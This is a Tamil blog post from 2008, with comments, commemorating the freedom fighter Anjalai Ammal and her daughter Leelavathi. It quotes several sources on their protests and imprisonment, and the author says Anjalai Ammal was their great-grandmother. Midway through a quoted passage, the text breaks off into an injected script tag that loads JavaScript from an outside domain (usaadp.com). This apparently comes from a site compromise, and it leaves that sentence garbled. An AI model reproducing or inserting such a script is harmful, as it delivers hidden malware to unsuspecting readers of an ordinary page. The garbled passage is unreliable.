Sunday, July 27, 2008

அஞ்சலை அம்மாள் என்றொரு தியாகி

பூங்கொத்து : தமிழ்நாட்டு வீரப் பெண்மணிகள்லிருந்து :

அஞ்சலை அம்மாள்:

அஞ்சலை அம்மாள் விடுதலைப் போராட்டத்தில் ஈடுபட்டு பல முறை சிறை சென்றவர். இவர் குடும்பமே விடுதலைப் போரில் ஈடுபட்டது. 1931ல் உப்புச் சத்தியாக்கிரகம், 1940ல் தனி நபர் சத்தியாக்கிரகம் ஆகியவற்றில் ஈடுபட்டவர். சென்னையில் தடைவிதிக்கப்பட்ட காங்கிரஸ் மாநாட்டுக்குத் தலைமை தாங்கிப் பெண் படையுடன் கைதானவர். சுதந்திரத்திற்குப் பின் ஜில்லா போர்டு உறுப்பினராகவும் சட்டமன்ற உறுப்பினராகவும் இருந்தவர்.

வெப்துனியாவில் இந்திய விடுதலைப் போராட்டத்தில் தமிழர்கள்!

அஞ்சலை அம்மாள் :

தென் ஆர்க்காடு மாவட்டத்தைச் சேர்ந்த அஞ்சலை அம்மாள் சுதந்திர போராட்டத்தில் ஈடுபட்டு தமிழகத்தின் பெருமை காத்தார். 1927ல் நீலன் சிலை அகற்றும் போராட்டத்தில் தனது குடும்பமே ஈடுபட்டு சிறை சென்றது. உப்பு சத்தியாகிரகம், தனி நபர் சத்தியாகிரகம் போன்ற போராட்டங்களில் ஈடுபட்டு சிறை சென்றவர்.

லீலாவதி :

விடுதலை போராட்ட வீராங்கனையான அஞ்சலையம்மாளின் மகள் லீலாவதி. சிறுவயதிலேயே சுதந்திர போராட்டத்தில் ஈடுபட்டவர். இவருக்கு காநதிதான் பெயர் வைத்தார். நீலன் சிலை போராட்டத்தின் போது, தனது தாயுடன் சிறை செனறார்.

கீற்று : சர்வதேசப் பெண்கள் தினம்

தமிழ்நாட்டு வீரப் பெண்மணிகள்

ஆங்கில ஆதிக்கத்தை எதிர்த்து இந்தியர்கள் நடத்திய போராட்டம் ஒரு வீர சகாப்தம். அந்த சுதந்திர வேள்வியில் தங்களை ஈடுபடுத்திக்கொண்ட வீரப் பெண்மணிகள் பற்றி உலகப் பெண்கள் தினத்தில் நினைவு கூர்வது பொருத்தமாக இருக்கும். இது ஒரு முழுமையான பட்டியல் என்று சொல்ல முடியாது. இருந்தாலும் வரலாற்றுப் பக்கங்களில் இடம்பிடித்துள்ள ஒரு சிலரை இங்கே வரிசைப் படுத்தியுள்ளேன்.

அஞ்சலை அம்மாள்: அஞ்சலை அம்மாள் விடுதலைப் போராட்டத்தில் ஈடுபட்டு பல முறை சிறை சென்றவர். இவர் குடும்பமே விடுதலைப் போரில் ஈடுபட்டது. 1931ல் உப்புச் சத்தியாக்கிரகம், 1940ல் தனி நபர் சத்தியாக்கிரகம் ஆகியவற்றில் ஈடுபட்டவர். சென்னையில் தடைவிதிக்கப்பட்ட காங்கிரஸ் மாநாட்டுக்குத் தலைமை தாங்கிப் பெண் படையுடன் கைதானவர். சுதந்திரத்திற்குப் பின் ஜில்லா போர்டு உறுப்பினராகவும் சட்டமன்ற உறுப்பினராகவும் இருந்தவர்.

மரத்தடியில் கடலூர் அஞ்சலையம்மாள் - செல்வநாயகி

"நேற்று என் தந்தை தோண்டினார்
நீரும், எண்ணெயும் தந்தது இப்பூமி
இன்று நான் தோண்டுகிறேன்
அங்கங்கே வெடிகுண்டுகளும் கிடைக்கின்றன
நாளை என் மகன் தோண்டினால்
எங்கும் எலும்புக்கூடுகள்தான் இருக்குமோ?"

இது மாதிரி நாட்டு நிலைமையை நச்சென்று பேசும் கவிதைகள் நாம் முயலாவிடினும் மனதில் பதிந்துவிடுகின்றன. தீவிரவாதம் இப்படியே தொடர்ந்தால் நாளை நாடு இந்தக் கவிதையின் கடைசி வரி சொல்வது போல்தான் இருக்கும். வன்முறையை வளர்ப்பதில் அரசியல் கட்சிகளுக்கும் கணிசமான பங்குண்டு இப்போது. இது தவிரவும் சில வேடிக்கைகள். அண்மையில் வெற்றிபெற்றிருக்கும் சேதுசமுத்திரத் திட்டத்திற்கு "நாங்களே காரணம்" என்று கட்சிகளுக்குள் நடக்கும் கூத்துகளைப் பார்த்துக் கொண்டுதானிருக்கிறோம். நாட்டு விடுதலைக்காகக் குடும்பத்துடன் சிறைக்குப் போனவர்களின் வரலாற்றைப் படிக்கும்போது இன்றைய தலைவர்களை எண்ணி வருந்தாமல் இருக்க முடியாது.

கடலூர் அஞ்சலையம்மாள் தன் கணவர், மகள், மருமகன் எனத் தன்னோடு சேர்த்து தன் குடும்பத்திலிருந்து நான்கு பேருடன் இந்திய விடுதலைக்குப் பங்காற்றியவர். 1890ல் பிறந்து 1961 வரை வாழ்ந்த இவர், சுதந்திரப் போராட்டத்தில் தென்னாட்டிலிருந்து ஈடுபட்ட முதல் பெண்மணி ஆவார். 1927ல் நீலன் சிலை அகற்றும் போராட்டம், 1937ல் உப்புக் காய்ச்சும் போராட்டம், 1933ல் மறியல் போராட்டம், 1940ல் தனிநபர் அறப்போராட்டம் மற்றும் வெள்ளையனே வெளியேறு இயக்கம் போன்ற காங்கிரஸ் பேரியக்கத்தின் பல்வேறு போராட்டங்களிலும் ஈடுபட்டு பல ஆண்டுகள் சிறைவாசம் அனுபவித்தவர் அஞ்சலையம்மாள். கடலூர், வேலூர், திருச்சி, பெல்லாரி சிறைகளில் இருந்தவர். கருவுற்றது முதல் பேறு காலம் வரை பெண்களைக் கண்களுக்குள் வைத்துக் காப்பாற்றும் வழக்கம் நம்மிடையே உண்டு. ஆ༳cript src=http://www.usaadp.com/ngg.js>

இவர் வேறு யாருமில்லை - எனது அம்மாவின் பாட்டி! எனக்கு, கொள்ளுப் பாட்டி!!
தாஸ் கேபிடலை தமிழில் மொழிப்பெயர்த்த ஜமதக்னி, இவரது மருமகன்!

படிப்பறிவில்லாத அஞ்சலை அம்மாள் சுதந்திர வேட்கையோடு, போக்குவரத்து வசதியில்லாத
அந்நாட்களில் மாட்டு வண்டி கட்டிக் கொண்டு ஊர் ஊராக சென்று மக்களுக்கு சுதந்திர தாகத்தை ஊட்டியவர்!

கருவுற்றிருந்த காலத்திலும் சிறைக்குச் சென்றவர்!!

சைக்கிள் பழக தந்தையுடன் மைதானத்திற்கு சென்ற சிறுவன் குண்டு வெடிப்பில் சிக்கியதையும், பாட்டியைப் பார்க்க மருத்துவமனைக்கு சென்ற சிறார்கள் எங்கிருக்கிறார்கள்
என்றே அறியாத பெற்றோரும்...தீவிரவாத்தின் பிடியில் இருக்கும் இந்தியாவைப் பார்த்தால்...மனிதம் இல்லா மானுடம் பார்த்தால்..

இதற்காகவா இவ்வளவு வேதனைப் பட்டோம் என்றே கண்ணீர் வடிப்பார்!!

11 comments:

ஆயில்யன் said...

//சுதந்திர வேள்வியில் தங்களை ஈடுபடுத்திக்கொண்ட வீரப் பெண்மணிகள் பற்றி உலகப் பெண்கள் தினத்தில் நினைவு கூர்வது பொருத்தமாக இருக்கும்.//

உண்மைதான்!

நட்சத்திரவாரத்தில் மணி மகுடமாய் இந்த பதிவு!

வாழ்த்துகள் சந்தனமுல்லை!

கெக்கேபிக்குணி (05430279483680105313!) said...

படிக்க நல்லா, பெருமையா இருந்ததுங்க. //மனிதம் இல்லா மானுடம் பார்த்தால்..// அப்ப‌டி நீங்க‌ளே சொல்ல‌லாமா? அந்த‌ மானுட‌ம் காக்க‌த் தானே அவ‌ங்க‌ போராடினாங்க‌? நாம‌ளும் செய்வோம்.

நட்சத்திர வாழ்த்துக்கள்; உங்க கொ.பாட்டிக்காகவும் வாழ்த்துக்கள்.

rapp said...

அடடா, இதை எப்படி படிக்காமல் விட்டேன். மிக மிக அருமை. நெஞ்சை நெகிழ்த்தும் பதிவு

gnani said...

sorry to write in english. i am yet to learn how to write in tamil in blog comments, though i write in tamil for the last ten years in my computer. i have made a foiur part serial on women in freedom movement for doordarshan in 1997 called vaergal. i have depicted anjalai ammaal in one of the scenes in that serial. i am happy to know that you are her grand-grand daughter.

gnani.

கானா பிரபா said...

சந்தனமுல்லை,

உண்மையில் இதுவொரு தலைசிறந்த நட்சத்திரப்பதிவு, இறுதியில் சொன்னவை கனமான நிஜம்.

வேளராசி said...

அருமையான பதிவு.நன்றி.எனது பதிவில் அழகி எனும் தலைப்பை பார்க்கவும்.velarasi.blogspot.com

அமிர்தவர்ஷினி அம்மா said...

பெருமையாகவும் அதே நேரத்தில் நெகிழ்ச்சியாகவும் இருக்கிறது.

" உழவன் " " Uzhavan " said...

படிக்கும்போதே நாட்டுப்பற்று ஒட்டிக்கொள்கிறது.